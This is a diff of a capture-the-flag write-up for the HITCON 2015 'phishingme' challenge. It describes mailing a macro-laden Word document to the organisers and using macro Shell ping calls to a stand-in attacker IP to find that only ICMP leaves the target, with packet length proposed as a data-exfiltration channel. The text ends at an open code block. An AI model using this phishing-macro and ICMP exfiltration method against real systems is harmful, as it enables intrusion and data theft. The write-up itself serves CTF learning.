spnow/tuya/ctf2015/hitcon-quals/phishingme-200/readme.md

 - MS Windows
 - Ms Word with Macro
-- Email title with HITCON 2015
+- Email with subject "HITCON 2015"
-- Email Address to phishing.me.hitcon.2015@gmail.com
+- RCPT TO: phishing.me.hitcon.2015@gmail.com

 Once all this condition is fulfilled.
-We received an confirmation email from HITCON I've read your doc.
+We received an confirmation email from HITCON
+> I've read your doc.
 Interesting

 First guess was, ping to home
-Shell ("ping -n 1 my.ip.add.ress")
+> Shell ("ping -n 1 my.ip.add.ress")

 TCPDUMP from home with ICMP on.
-Bingo, we go packets We went and wrote few more connection script like email, web and DNS.
+Bingo, packet received.
+We went and wrote few more connection script like email and web.
 Looks like we got no luck at all.
-So we concluded.
+So we concluded,

 - NO Outgoing TCP Allowed (** ppp solved it with DNS)

-Concluded only ICMP able to to go out from the box.
+Looks like ICMP able to to go out from the box.
 So, we did another test.

 > Shell ("ping -n 1 -l 2 my.ip.add.ress")

 And we received

-11:29:43.643405 IP 54.92.10.249 > my.ip.add.ress: ICMP echo request, id 1, seq 2249, length 10
+> 11:29:43.643405 IP 54.92.10.249 > my.ip.add.ress: ICMP echo request, id 1, seq 2249, length 10

 This is clear that we can somehow use the length to pass some data.
 So, first thing is.
 We want to know where are we.
 ```